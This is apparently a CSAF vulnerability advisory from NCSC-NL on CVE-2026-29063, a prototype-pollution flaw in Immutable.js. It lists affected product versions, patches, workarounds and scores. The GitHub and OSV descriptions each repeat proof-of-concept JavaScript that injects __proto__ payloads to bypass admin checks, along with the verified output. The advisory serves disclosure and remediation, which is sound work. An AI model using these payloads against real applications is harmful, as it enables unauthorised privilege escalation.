{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-29063", "tracking": { "current_release_date": "2026-04-03T00:31:48.449054Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-29063", "initial_release_date": "2026-03-04T21:51:00.240449Z", "revision_history": [ { "date": "2026-03-04T21:51:00.240449Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (6).| CWES updated (1)." }, { "date": "2026-03-04T21:51:08.569005Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-05T00:20:49.727155Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (2).| References created (5).| CWES updated (1)." }, { "date": "2026-03-05T00:21:02.713132Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-06T19:26:22.250705Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-06T19:26:26.796784Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-06T19:39:02.212882Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (3).| References created (4).| CWES updated (1).| Unknown change." }, { "date": "2026-03-06T19:39:03.755853Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-06T22:07:55.522144Z", "number": "9", "summary": "Description removed for source.| Description created for source.| References created (3)." }, { "date": "2026-03-06T23:39:42.553190Z", "number": "10", "summary": "References created (1)." }, { "date": "2026-03-07T00:21:02.917199Z", "number": "11", "summary": "Description removed for source.| Description created for source.| Products created (2).| Products removed (1).| References created (4)." }, { "date": "2026-03-07T00:46:27.387786Z", "number": "12", "summary": "Source created.| CVE status created. (valid)| Products created (2)." }, { "date": "2026-03-07T00:46:35.147671Z", "number": "13", "summary": "NCSC Score updated." }, { "date": "2026-03-07T06:43:38.013427Z", "number": "14", "summary": "Description created for source." }, { "date": "2026-03-07T14:47:10.259816Z", "number": "15", "summary": "Source created.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-20T09:35:46.559400Z", "number": "16", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-20T09:35:49.678222Z", "number": "17", "summary": "NCSC Score updated." }, { "date": "2026-03-25T12:26:16.639248Z", "number": "18", "summary": "Source connected.| CVE status created. (valid)| Products connected (1).| References created (6)." }, { "date": "2026-03-25T12:26:18.579942Z", "number": "19", "summary": "NCSC Score updated." }, { "date": "2026-03-26T02:42:01.621529Z", "number": "20", "summary": "Source created.| CVE status created. (valid)" }, { "date": "2026-03-26T02:42:15.949301Z", "number": "21", "summary": "NCSC Score updated." }, { "date": "2026-04-03T00:31:24.336717Z", "number": "22", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (8).| Product Remediations created (2).| Product Identifiers created (24).| Product Identifiers removed (24).| References created (19).| CWES updated (1)." }, { "date": "2026-04-03T00:31:38.059265Z", "number": "23", "summary": "NCSC Score updated." } ], "status": "interim", "version": "23" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/1.11", "product": { "name": "vers:rpm/1.11", "product_id": "CSAFPID-5986015", "product_identification_helper": { "cpe": "cpe:/a:redhat:network_observ_optr:1.11::el9" } } } ], "category": "product_name", "name": "Network Observability (NETOBSERV) 1.11.1" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773992622", "product": { "name": "vers:oci/1773992622", "product_id": "CSAFPID-5986016", "product_identification_helper": { "purl": "pkg:oci/network-observability-cli-rhel9@sha256%3Ab0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80?arch=ppc64le&repository_url=registry.redhat.io/network-observability&tag=1773992622" } } } ], "category": "product_name", "name": "network-observability-cli-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774431392", "product": { "name": "vers:oci/1774431392", "product_id": "CSAFPID-5986020", "product_identification_helper": { "purl": "pkg:oci/network-observability-console-plugin-compat-rhel9@sha256%3A40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b?arch=amd64&repository_url=registry.redhat.io/network-observability&tag=1774431392" } } } ], "category": "product_name", "name": "network-observability-console-plugin-compat-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774431617", "product": { "name": "vers:oci/1774431617", "product_id": "CSAFPID-5986021", "product_identification_helper": { "purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256%3A51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c?arch=s390x&repository_url=registry.redhat.io/network-observability&tag=1774431617" } } } ], "category": "product_name", "name": "network-observability-console-plugin-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774887582", "product": { "name": "vers:oci/1774887582", "product_id": "CSAFPID-5986017", "product_identification_helper": { "purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256%3Adc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518?arch=arm64&repository_url=registry.redhat.io/network-observability&tag=1774887582" } } } ], "category": "product_name", "name": "network-observability-ebpf-agent-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773997913", "product": { "name": "vers:oci/1773997913", "product_id": "CSAFPID-5986018", "product_identification_helper": { "purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256%3Aa72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088?arch=s390x&repository_url=registry.redhat.io/network-observability&tag=1773997913" } } } ], "category": "product_name", "name": "network-observability-flowlogs-pipeline-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774962696", "product": { "name": "vers:oci/1774962696", "product_id": "CSAFPID-5986022", "product_identification_helper": { "purl": "pkg:oci/network-observability-operator-bundle@sha256%3A325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607?arch=amd64&repository_url=registry.redhat.io/network-observability&tag=1774962696" } } } ], "category": "product_name", "name": "network-observability-operator-bundle" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774859742", "product": { "name": "vers:oci/1774859742", "product_id": "CSAFPID-5986019", "product_identification_helper": { "purl": "pkg:oci/network-observability-rhel9-operator@sha256%3Adc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453?arch=s390x&repository_url=registry.redhat.io/network-observability&tag=1774859742" } } } ], "category": "product_name", "name": "network-observability-rhel9-operator" } ], "category": "product_family", "name": "Network Observability (NETOBSERV)" } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/liberty <26.0.0.4", "product": { "name": "vers:unknown/liberty <26.0.0.4", "product_id": "CSAFPID-5905823" } } ], "category": "product_name", "name": "WebSphere Application Server" } ], "category": "vendor", "name": "IBM" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=0|<3.8.3", "product": { "name": "vers:unknown/>=0|<3.8.3", "product_id": "CSAFPID-5767901" } }, { "category": "product_version_range", "name": "vers:unknown/>=4.0.0-rc.1|<4.3.8", "product": { "name": "vers:unknown/>=4.0.0-rc.1|<4.3.8", "product_id": "CSAFPID-5767900" } }, { "category": "product_version_range", "name": "vers:unknown/>=5.0.0|<5.1.5", "product": { "name": "vers:unknown/>=5.0.0|<5.1.5", "product_id": "CSAFPID-5759791" } } ], "category": "product_name", "name": "immutable" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<3.8.3", "product": { "name": "vers:unknown/<3.8.3", "product_id": "CSAFPID-5767297" } }, { "category": "product_version_range", "name": "vers:unknown/<4.3.7", "product": { "name": "vers:unknown/<4.3.7", "product_id": "CSAFPID-5767298" } }, { "category": "product_version_range", "name": "vers:unknown/<5.1.5", "product": { "name": "vers:unknown/<5.1.5", "product_id": "CSAFPID-5767299" } } ], "category": "product_name", "name": "immutable-js" } ], "category": "vendor", "name": "immutable-js" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-5768418" } } ], "category": "product_name", "name": "node-immutable" } ], "category": "product_family", "name": "bookworm" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-5768419" } } ], "category": "product_name", "name": "node-immutable" } ], "category": "product_family", "name": "bullseye" } ], "category": "vendor", "name": "debian" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-29063", "cwe": { "id": "CWE-1321", "name": "Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')" }, "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "CSAFPID-5986016", "CSAFPID-5986017", "CSAFPID-5986018", "CSAFPID-5986019", "CSAFPID-5986020", "CSAFPID-5986022" ] } ], "notes": [ { "category": "description", "text": "Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5.", "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-29063" }, { "category": "description", "text": "Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5.", "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-29063" }, { "category": "description", "text": "## Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nA Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs.\n\n## Affected APIs\n\n| API | Notes |\n| --------------------------------------- | ----------------------------------------------------------- |\n| `mergeDeep(target, source)` | Iterates source keys via `ObjectSeq`, assigns `merged[key]` |\n| `mergeDeepWith(merger, target, source)` | Same code path |\n| `merge(target, source)` | Shallow variant, same assignment logic |\n| `Map.toJS()` | `object[k] = v` in `toObject()` with no `__proto__` guard |\n| `Map.toObject()` | Same `toObject()` implementation |\n| `Map.mergeDeep(source)` | When source is converted to plain object |\n\n\n\n## Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n| major version | patched version |\n| --- | --- |\n| 3.x | 3.8.3 |\n| 4.x | 4.3.7 |\n| 5.x | 5.1.5 |\n\n## Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n- [Validate user input](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#validate_user_input)\n- [Node.js flag --disable-proto](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#node.js_flag_--disable-proto)\n- [Lock down built-in objects](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#lock_down_built-in_objects)\n- [Avoid lookups on the prototype](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#avoid_lookups_on_the_prototype)\n- [Create JavaScript objects with null prototype](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#create_javascript_objects_with_null_prototype)\n\n## Proof of Concept\n\n### PoC 1 — mergeDeep privilege escalation\n\n```javascript\n\"use strict\";\nconst { mergeDeep } = require(\"immutable\"); // v5.1.4\n\n// Simulates: app merges HTTP request body (JSON) into user profile\nconst userProfile = { id: 1, name: \"Alice\", role: \"user\" };\nconst requestBody = JSON.parse(\n '{\"name\":\"Eve\",\"__proto__\":{\"role\":\"admin\",\"admin\":true}}',\n);\n\nconst merged = mergeDeep(userProfile, requestBody);\n\nconsole.log(\"merged.name:\", merged.name); // Eve (updated correctly)\nconsole.log(\"merged.role:\", merged.role); // user (own property wins)\nconsole.log(\"merged.admin:\", merged.admin); // true ← INJECTED via __proto__!\n\n// Common security checks — both bypassed:\nconst isAdminByFlag = (u) => u.admin === true;\nconst isAdminByRole = (u) => u.role === \"admin\";\nconsole.log(\"isAdminByFlag:\", isAdminByFlag(merged)); // true ← BYPASSED!\nconsole.log(\"isAdminByRole:\", isAdminByRole(merged)); // false (own role=user wins)\n\n// Stealthy: Object.keys() hides 'admin'\nconsole.log(\"Object.keys:\", Object.keys(merged)); // ['id', 'name', 'role']\n// But property lookup reveals it:\nconsole.log(\"merged.admin:\", merged.admin); // true\n```\n\n### PoC 2 — All affected APIs\n\n```javascript\n\"use strict\";\nconst { mergeDeep, mergeDeepWith, merge, Map } = require(\"immutable\");\n\nconst payload = JSON.parse('{\"__proto__\":{\"admin\":true,\"role\":\"superadmin\"}}');\n\n// 1. mergeDeep\nconst r1 = mergeDeep({ user: \"alice\" }, payload);\nconsole.log(\"mergeDeep admin:\", r1.admin); // true\n\n// 2. mergeDeepWith\nconst r2 = mergeDeepWith((a, b) => b, { user: \"alice\" }, payload);\nconsole.log(\"mergeDeepWith admin:\", r2.admin); // true\n\n// 3. merge\nconst r3 = merge({ user: \"alice\" }, payload);\nconsole.log(\"merge admin:\", r3.admin); // true\n\n// 4. Map.toJS() with __proto__ key\nconst m = Map({ user: \"alice\" }).set(\"__proto__\", { admin: true });\nconst r4 = m.toJS();\nconsole.log(\"toJS admin:\", r4.admin); // true\n\n// 5. Map.toObject() with __proto__ key\nconst m2 = Map({ user: \"alice\" }).set(\"__proto__\", { admin: true });\nconst r5 = m2.toObject();\nconsole.log(\"toObject admin:\", r5.admin); // true\n\n// 6. Nested path\nconst nested = JSON.parse('{\"profile\":{\"__proto__\":{\"admin\":true}}}');\nconst r6 = mergeDeep({ profile: { bio: \"Hello\" } }, nested);\nconsole.log(\"nested admin:\", r6.profile.admin); // true\n\n// 7. Confirm NOT global\nconsole.log(\"({}).admin:\", {}.admin); // undefined (global safe)\n```\n\n**Verified output against immutable@5.1.4:**\n\n```\nmergeDeep admin: true\nmergeDeepWith admin: true\nmerge admin: true\ntoJS admin: true\ntoObject admin: true\nnested admin: true\n({}).admin: undefined ← global Object.prototype NOT polluted\n```\n\n\n## References\n_Are there any links users can visit to find out more?_\n\n- [JavaScript prototype pollution](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution)", "title": "github - https://github.com/advisories/GHSA-wf6x-7x77-mvgw" }, { "category": "description", "text": "## Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nA Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs.\n\n## Affected APIs\n\n| API | Notes |\n| --------------------------------------- | ----------------------------------------------------------- |\n| `mergeDeep(target, source)` | Iterates source keys via `ObjectSeq`, assigns `merged[key]` |\n| `mergeDeepWith(merger, target, source)` | Same code path |\n| `merge(target, source)` | Shallow variant, same assignment logic |\n| `Map.toJS()` | `object[k] = v` in `toObject()` with no `__proto__` guard |\n| `Map.toObject()` | Same `toObject()` implementation |\n| `Map.mergeDeep(source)` | When source is converted to plain object |\n\n\n\n## Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n| major version | patched version |\n| --- | --- |\n| 3.x | 3.8.3 |\n| 4.x | 4.3.7 |\n| 5.x | 5.1.5 |\n\n## Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n- [Validate user input](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#validate_user_input)\n- [Node.js flag --disable-proto](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#node.js_flag_--disable-proto)\n- [Lock down built-in objects](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#lock_down_built-in_objects)\n- [Avoid lookups on the prototype](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#avoid_lookups_on_the_prototype)\n- [Create JavaScript objects with null prototype](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution#create_javascript_objects_with_null_prototype)\n\n## Proof of Concept\n\n### PoC 1 — mergeDeep privilege escalation\n\n```javascript\n\"use strict\";\nconst { mergeDeep } = require(\"immutable\"); // v5.1.4\n\n// Simulates: app merges HTTP request body (JSON) into user profile\nconst userProfile = { id: 1, name: \"Alice\", role: \"user\" };\nconst requestBody = JSON.parse(\n '{\"name\":\"Eve\",\"__proto__\":{\"role\":\"admin\",\"admin\":true}}',\n);\n\nconst merged = mergeDeep(userProfile, requestBody);\n\nconsole.log(\"merged.name:\", merged.name); // Eve (updated correctly)\nconsole.log(\"merged.role:\", merged.role); // user (own property wins)\nconsole.log(\"merged.admin:\", merged.admin); // true ← INJECTED via __proto__!\n\n// Common security checks — both bypassed:\nconst isAdminByFlag = (u) => u.admin === true;\nconst isAdminByRole = (u) => u.role === \"admin\";\nconsole.log(\"isAdminByFlag:\", isAdminByFlag(merged)); // true ← BYPASSED!\nconsole.log(\"isAdminByRole:\", isAdminByRole(merged)); // false (own role=user wins)\n\n// Stealthy: Object.keys() hides 'admin'\nconsole.log(\"Object.keys:\", Object.keys(merged)); // ['id', 'name', 'role']\n// But property lookup reveals it:\nconsole.log(\"merged.admin:\", merged.admin); // true\n```\n\n### PoC 2 — All affected APIs\n\n```javascript\n\"use strict\";\nconst { mergeDeep, mergeDeepWith, merge, Map } = require(\"immutable\");\n\nconst payload = JSON.parse('{\"__proto__\":{\"admin\":true,\"role\":\"superadmin\"}}');\n\n// 1. mergeDeep\nconst r1 = mergeDeep({ user: \"alice\" }, payload);\nconsole.log(\"mergeDeep admin:\", r1.admin); // true\n\n// 2. mergeDeepWith\nconst r2 = mergeDeepWith((a, b) => b, { user: \"alice\" }, payload);\nconsole.log(\"mergeDeepWith admin:\", r2.admin); // true\n\n// 3. merge\nconst r3 = merge({ user: \"alice\" }, payload);\nconsole.log(\"merge admin:\", r3.admin); // true\n\n// 4. Map.toJS() with __proto__ key\nconst m = Map({ user: \"alice\" }).set(\"__proto__\", { admin: true });\nconst r4 = m.toJS();\nconsole.log(\"toJS admin:\", r4.admin); // true\n\n// 5. Map.toObject() with __proto__ key\nconst m2 = Map({ user: \"alice\" }).set(\"__proto__\", { admin: true });\nconst r5 = m2.toObject();\nconsole.log(\"toObject admin:\", r5.admin); // true\n\n// 6. Nested path\nconst nested = JSON.parse('{\"profile\":{\"__proto__\":{\"admin\":true}}}');\nconst r6 = mergeDeep({ profile: { bio: \"Hello\" } }, nested);\nconsole.log(\"nested admin:\", r6.profile.admin); // true\n\n// 7. Confirm NOT global\nconsole.log(\"({}).admin:\", {}.admin); // undefined (global safe)\n```\n\n**Verified output against immutable@5.1.4:**\n\n```\nmergeDeep admin: true\nmergeDeepWith admin: true\nmerge admin: true\ntoJS admin: true\ntoObject admin: true\nnested admin: true\n({}).admin: undefined ← global Object.prototype NOT polluted\n```\n\n\n## References\n_Are there any links users can visit to find out more?_\n\n- [JavaScript prototype pollution](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/Prototype_pollution)", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-wf6x-7x77-mvgw.json?alt=media" }, { "category": "description", "text": "Immutable.js provides many Persistent Immutable data structures. Prior to versions 3.8.3, 4.3.7, and 5.1.5, Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs. This issue has been patched in versions 3.8.3, 4.3.7, and 5.1.5.", "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-29063" }, { "category": "description", "text": "A flaw was found in Immutable.js, a library for persistent immutable data structures. This vulnerability, known as Prototype Pollution, allows an attacker with low privileges to inject unwanted properties into core JavaScript object prototypes without user interaction. By manipulating specific APIs such as mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject(), a remote attacker could potentially execute arbitrary code or cause a denial of service (DoS).", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6428.json" }, { "category": "other", "text": "0.0006", "title": "EPSS" }, { "category": "other", "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N", "title": "CVSSV4" }, { "category": "other", "text": "8.7", "title": "CVSSV4 base score" }, { "category": "other", "text": "4.4", "title": "NCSC Score" }, { "category": "other", "text": "The value of the most recent CVSS (V3) score, VENDOR FIX as product remediation category, There is product data available from source Certbundde", "title": "NCSC Score top increasing factors" }, { "category": "other", "text": "There is cwe data available from source Nvd, Is related to CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution'))", "title": "NCSC Score top decreasing factors" } ], "product_status": { "fixed": [ "CSAFPID-5986021" ], "known_affected": [ "CSAFPID-5759791", "CSAFPID-5767297", "CSAFPID-5767298", "CSAFPID-5767299", "CSAFPID-5767900", "CSAFPID-5767901", "CSAFPID-5768418", "CSAFPID-5768419", "CSAFPID-5905823" ], "known_not_affected": [ "CSAFPID-5986016", "CSAFPID-5986017", "CSAFPID-5986018", "CSAFPID-5986019", "CSAFPID-5986020", "CSAFPID-5986022" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-wf6x-7x77-mvgw" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-wf6x-7x77-mvgw" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-wf6x-7x77-mvgw.json?alt=media" }, { "category": "external", "summary": "Source - nvd", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063" }, { "category": "external", "summary": "Source raw - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-29063" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://www.cve.org/CVERecord?id=CVE-2026-29063" }, { "category": "external", "summary": "Source raw - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/29xxx/CVE-2026-29063.json" }, { "category": "external", "summary": "Source - debian", "url": "https://security-tracker.debian.org/tracker/CVE-2026-29063" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29063" }, { "category": "external", "summary": "Source raw - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - certbundde", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0845.json" }, { "category": "external", "summary": "Source - hkcert", "url": "https://www.hkcert.org/security-bulletin/ibm-websphere-products-multiple-vulnerabilities_20260326" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:6428.json" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://github.com/immutable-js/immutable-js/commit/16b3313fdf2c5f579f10799e22869f6909abf945" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://github.com/immutable-js/immutable-js/commit/6ed4eb626906df788b08019061b292b90bc718cb" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-wf6x-7x77-mvgw" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://github.com/immutable-js/immutable-js/issues/2178" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://github.com/immutable-js/immutable-js/commit/6e2cf1cfe6137e72dfa48fc2cfa8f4d399d113f9" }, { "category": "external", "summary": "Reference - github; osv; redhat", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0845.json" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0845" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://www.ibm.com/support/pages/node/7267345" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://www.ibm.com/support/pages/node/7267347" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://www.ibm.com/support/pages/node/7267351" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://www.ibm.com/support/pages/node/7267362" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-29063" }, { "category": "external", "summary": "Reference - redhat", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445291" }, { "category": "external", "summary": "Reference - redhat", "url": "https://www.cve.org/CVERecord?id=CVE-2026-29063" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/errata/RHSA-2026:6428" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-61726" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-61728" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-61729" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2025-68121" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-25639" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-26960" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-33186" }, { "category": "external", "summary": "Reference - redhat", "url": "https://access.redhat.com/security/updates/classification/" }, { "category": "external", "summary": "Reference - redhat", "url": "https://docs.openshift.com/container-platform/latest/observability/network_observability/network-observability-operator-release-notes.html" }, { "category": "external", "summary": "Reference - redhat", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6428.json" } ], "remediations": [ { "category": "vendor_fix", "details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "CSAFPID-5986015", "CSAFPID-5986021" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2026:6428" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5759791", "CSAFPID-5767297", "CSAFPID-5767298", "CSAFPID-5767299", "CSAFPID-5767900", "CSAFPID-5767901", "CSAFPID-5768418", "CSAFPID-5768419", "CSAFPID-5905823" ] } ], "title": "CVE-2026-29063" } ] }